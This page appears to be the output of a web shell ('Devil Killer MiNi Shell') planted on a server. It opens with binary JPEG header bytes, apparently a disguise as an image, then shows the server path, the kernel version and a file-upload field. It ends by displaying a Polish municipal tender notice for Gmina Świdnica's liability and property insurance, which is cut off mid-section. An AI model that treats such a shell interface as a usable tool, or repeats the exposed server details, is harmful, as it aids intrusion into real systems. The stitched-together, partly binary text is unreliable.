JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230620/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230620/0026773901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie ochrony ubezpieczeniowej w zakresie<br/>ubezpieczenia oc , mienia Gminy Świdnica i jednostek organizacyjnych oraz ubezpieczenia oc strażaków OSP Gminy Świdnica </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ŚWIDNICA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 890718389</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bartosza Głowackiego 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świdnica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@gmina.swidnica.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gmina.swidnica.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie ochrony ubezpieczeniowej w zakresie<br/>ubezpieczenia oc , mienia Gminy Świdnica i jednostek organizacyjnych oraz ubezpieczenia oc strażaków OSP Gminy Świdnica </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-71ff5a84-0f4e-11ee-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00267739</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-06-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00006180/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Świadczenie ochrony ubezpieczeniowej w zakresie ubezpieczenia odpowiedzialności cywilnej, ubezpieczenie mienia Gminy Świdnica wraz z jednostkami organizacyjnymi</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gminaswidnica.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Niniejsze postępowanie prowadzone jest za pomocą środków komunikacji<br/>elektronicznej. Komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz<br/>informacje przekazywane są za pomocą : poczty elektronicznej na adres e-mail: przetargi@gmina.swidnica.pl lub (z<br/>zastrzeżeniem,że oferta wraz z załącznikami złożona musi być na Platformy Przetargowej Gminy Świdnica) oraz przy użyciu<br/>Platformy Przetargowej Gminy Świdnica<br/>https://gminaswidnica.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między zamawiającym a wykonawcami, w tym wszelkie<br/>oświadczenia,wnioski,zawiadomienia oraz informacje przekazywane są, przy użyciu Platformy Przetargowej Gminy<br/>Świdnicahttps://gminaswidnica.logintrade.net/rejestracja/ustawowe.html.<br/>Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej na adres e-mail:<br/>przetargi@gmina.swidnica.pl (z zastrzeżeniem, że oferta wraz z załącznikami złożona musi być na platformie).2. Do połączenia<br/>używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat SSL zapewnia<br/>poufność transmisji danych przesyłanych przez Internet. Wykonawca posiadający konto na Platformie Przetargowej Gminy Świdnica<br/>ma dostęp do możliwości złożenia, zmiany, wycofania oferty, a także funkcjonalności pozwalających nazadawanie pytań do treści<br/>SWZ oraz komunikację z Zamawiającym w pozostałych obszarach.3. Wymagania techniczne wysyłania i odbierania dokumentów<br/>elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy użyciu Platformy<br/>Przetargowej dostępne są pod adresem https://gminaswidnica.logintrade.net/rejestracja/instrukcje.html4. Informacje o wymaganiach<br/>technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej:a)Środkiem komunikacji<br/>elektronicznej, służącym złożeniu oferty przez Wykonawcę, jest prawidłowe złożenie na Platformie dostępnej pod adresem<br/>https://gminaswidnica.logintrade.net/rejestracja/ustawowe.html w wierszu oznaczonym tytułem oraz znakiem sprawy zgodnym z<br/>niniejszym postępowaniem. b) Instrukcja złożenia oferty środkiem komunikacji elektronicznej w niniejszym postępowaniu dostępna<br/>jest na stronie https://gminaswidnica.logintrade.net/rejestracja/ w zakładce INSTRUKCJE plik Udział w trybie podstawowym bez<br/>negocjacji.c)<br/>Wymagania sprzętowo- aplikacyjne umożliwiające pracę na platformie: Dopuszczalne przeglądarki internetowe: -Internet Explorer 10<br/>i nowsze, Edge-Google Chrome-MozillaFirefox-Operad) Pozostałe wymagania techniczne: -dostęp do sieci internet; -obsługa przez<br/>przeglądarkę protokołu XMLHttpRequest – ajax; -włączona obsługa JavaScript;-zalecana szybkość łącza internetowego powyżej 500<br/>KB/s; -zainstalowany Acrobat Reader; -zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update<br/>24 lub nowszy. 5. Po stworzeniu lub wygenerowaniu przez Wykonawcę dokumentu elektronicznego Wykonawca podpisuje ten<br/>dokument kwalifikowanym podpisem elektronicznym, wystawionym przez dostawcę kwalifikowanej usługi zaufania, będącego<br/>podmiotem świadczącym usługi certyfikacyjne – podpis elektroniczny, spełniające wymogi bezpieczeństwa określone w ustawie z<br/>dnia 5 września 2016 r. o usługach zaufania oraz identyfikacji elektronicznej (Dz.U. z 2020 r. poz. 1173 t.j.) lub podpisem zaufanym<br/>lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”,<br/>informuję, że:1)administratorem Pani/Pana danych osobowych jest<br/>Gmina Świdnica ul. B. Głowackiego 4, 58-100 Świdnica, email:<br/>urząd@gmina.swidnica.pl,www.gmina.swidnica.pl, tel. 74 8523067, fax 74 8523067 wew.400, NIP 884-23-65-<br/>226,Regon890718389,2) dane kontaktowe do inspektora ochrony danych osobowych w Gminie Świdnica w Świdnicy –<br/>krzysztof.olejniczak@comars.pl tel. 609 010 402.; Inspektorem ochrony danych osobowych jest Pan Krzysztof<br/>Olejniczak,3)Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia<br/>przedmiotowego postępowania o udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania<br/>jest obowiązek prawny stosowania sformalizowanych procedur udzielania zamówień publicznych spoczywający na<br/>Zamawiającym;4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp;5)Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust.<br/>1ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowyprzekracza4lata, okres przechowywania obejmuje cały czas trwania umowy; 6)obowiązek podania przez Panią/Pana danych<br/>osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z<br/>udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy<br/>Pzp; 7)w<br/>odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO;8)Posiada Pan/Pani:a) na podstawie art. 15RODO prawo dostępu do danych<br/>osobowych Pani/Pana dotyczących; b) na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych<br/>osobowych, przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o<br/>udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać<br/>integralności protokołu oraz jego załączników. c)na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków<br/>ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia postępowania o udzielenie zamówienia.d)prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy uzna<br/>Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; 9)nie przysługuje Pani/Panu:a) w<br/>związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;b)prawo do przenoszenia danych osobowych, o<br/>którym mowa w art. 20 RODO; c)na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.Pozostałe informacje dotyczące RODO<br/>określa SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.12.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie ochrony ubezpieczeniowej w zakresie OC dla Gminy oraz jednostek organizacyjnych oraz ubezpieczenia oc<br/>strażaków OSP Gminy Świdnica </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66516100-1 - Usługi ubezpieczenia pojazdów mechanicznych od odpowiedzialności cywilnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający<br/>przewiduje udzielenie zamówienia na podstawie Art. 214.1 pkt 7 - dopuszcza zwiększenie wartości zamówienia do 20% wartości<br/>zamówienia podstawowego</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.1.	Przy dokonywaniu wyboru najkorzystniejszej oferty dla Zadania 1 Zamawiający stosować będzie następujące kryteria:<br/>a.	cena oferty	50 %<br/>b.	klauzule dodatkowe	50 %<br/>Ad. a). Ocena punktowa za cenę oferty .<br/>Maksymalną ilość punktów (200 pkt) otrzyma oferta z najniższą ceną ofertową. Punkty będą przyznawane wg następującego wzoru<br/>	C =	C min	x 200 pkt<br/> C o	<br/>gdzie: C min – cena brutto oferty najtańszej <br/>	C o – cena brutto oferty ocenianej<br/>Pozostałe oferty zostaną przeliczone według powyższego wzoru.<br/>Ad. b). Ocena punktowa za klauzule dodatkowe<br/>Przy ocenie punktowej za klauzule dodatkowe najwyższą notę 200 punktów otrzyma oferta, w której zostaną zaakceptowane wszystkie dodatkowe klauzule fakultatywne określone w Załączniku nr 4 – OPZ-Karta Ryzyka do niniejszej specyfikacji (Zadanie 1).<br/>W przypadku braku akceptacji klauzul fakultatywnych, Zamawiający odejmie Wykonawcy za każdą skreśloną klauzulę 16 pkt, z wyjątkiem n/w gdzie:<br/>-	za skreślone ROZSZERZENIE Nr30 – Zamawiający odejmie 40 pkt.<br/>Po potrąceniach uzyskamy Sumę punktów za klauzule wg wzoru:<br/>Ilość punktów za klauzule przyznana ofercie = (Suma punktów za klauzule w ofercie badanej / Suma punktów oferty, która uzyskała najwięcej punktów po potrąceniach) x 200 punktów.<br/>W przypadku, jeżeli wszystkie oferty podlegające badaniu uzyskają po potrąceniach 0pkt, ilość punktów za klauzule przyznana ofercie = (Suma punktów za klauzule w ofercie badanej /Suma punktów możliwa maksymalnie do uzyskania 200pkt.) x 200 punktów.<br/>W przypadku, gdy w postępowaniu złożono jedną ofertę niepodlegającą odrzuceniu ilość punktów za klauzule przyznana ofercie = (Suma punktów za klauzule w ofercie badanej /Suma punktów możliwa maksymalnie do uzyskania 200pkt.) x 200 punktów<br/>Ogólna ilość punktów zostanie przeliczona wg wzoru:<br/>Liczba otrzymanych punktów = (liczba punktów za cenę oferty (max 200 pkt.) x 50%) + (l.p. za klauzule dodatkowe (max 200 pkt.) x 50%) <br/>Maksymalnie Wykonawca za ofertę na Zadanie 1 może uzyskać 200 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">klauzule dodatkowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie ochrony ubezpieczeniowej w zakresie ubezpieczenia mienia gminy Świdnica oraz jednostek organizacyjnych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66515100-4 - Usługi ubezpieczenia od ognia</p> <p class="mb-0">66515400-7 - Usługi ubezpieczenia od skutków żywiołów</p> <p class="mb-0">66515000-3 - Usługi ubezpieczenia od uszkodzenia lub utraty</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający<br/>przewiduje udzielenie zamówienia na podstawie Art. 214.1 pkt 7 - dopuszcza zwiększenie wartości zamówienia do 20% wartości<br/>zamówienia podstawowego</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.2.	Przy dokonywaniu wyboru najkorzystniejszej oferty dla Zadania 2 Zamawiający stosować będzie następujące kryteria:<br/>a.	cena oferty	50 %<br/>b.	klauzule dodatkowe	50 %<br/>Ad. a). Ocena punktowa za cenę oferty .<br/>Maksymalną ilość punktów (200 pkt) otrzyma oferta z najniższą ceną ofertową. Punkty będą przyznawane wg następującego wzoru<br/>	C =	C min	x 200 pkt<br/> C o	<br/>gdzie: C min – cena brutto oferty najtańszej <br/>	C o – cena brutto oferty ocenianej<br/>Pozostałe oferty zostaną przeliczone według powyższego wzoru.<br/>Ad. b). Ocena punktowa za klauzule <br/>Przy ocenie punktowej za klauzule najwyższą notę 200 punktów otrzyma oferta, w której zostaną zaakceptowane wszystkie klauzule fakultatywne oraz dodatkowe klauzule fakultatywne określone w Załączniku nr 4 – OPZ-Karta Ryzyka do niniejszej specyfikacji (Zadanie 2).<br/>W przypadku braku akceptacji klauzul fakultatywnych, Zamawiający odejmie Wykonawcy za każdą skreśloną klauzulę 5 pkt. Za każdą skreśloną klauzulę dodatkowa W Szczególnych warunkach UBEZPIECZENIU MIENIA OD OGNIA ( pkt4.1 do 4.4) Zamawiający odejmie Wykonawcy 20pkt.<br/>Suma punktów oferty, która uzyskała najwięcej punktów po potrąceniach) x 200 punktów.<br/>W przypadku, jeżeli wszystkie oferty podlegające badaniu uzyskają po potrąceniach 0pkt, ilość punktów za klauzule przyznana ofercie = (Suma punktów za klauzule w ofercie badanej /Suma punktów możliwa maksymalnie do uzyskania 200pkt.) x 200 punktów.<br/>W przypadku, gdy w postępowaniu złożono jedną ofertę niepodlegającą odrzuceniu ilość punktów za klauzule przyznana ofercie = (Suma punktów za klauzule w ofercie badanej /Suma punktów możliwa maksymalnie do uzyskania 200pkt.) x 200 punktów<br/>Ogólna ilość punktów zostanie przeliczona wg wzoru:<br/>Liczba otrzymanych punktów = (liczba punktów za cenę oferty (max 200 pkt.) x 50%) + (l.p. za klauzule dodatkowe (max 200 pkt.) x 50%) <br/>Maksymalnie Wykonawca za ofertę na Zadanie 2 może uzyskać 200 punktów<br/><br/>Maksymalnie Wykonawca za ofertę może uzyskać 200 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">klauzule dodatkowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 